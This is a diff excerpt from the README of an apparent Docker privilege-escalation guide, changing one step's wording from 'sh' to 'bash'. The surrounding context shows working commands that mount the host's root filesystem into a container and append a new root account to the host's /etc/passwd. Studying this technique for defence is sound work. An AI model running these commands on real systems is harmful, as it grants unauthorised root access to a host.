flast101/docker-privesc/README.md

 docker run -tid -v /:/mnt/ --name flast101 alpine
 ```

-**5. Execute a sh command in the container that will add the new root user to the /etc/passwd file:**
+**5. Execute a bash command in the container that will add the new root user to the /etc/passwd file:**
 ```
 docker exec -ti flast101 sh -c "cat /mnt/tmp/new_account >> /mnt/etc/passwd"
 ```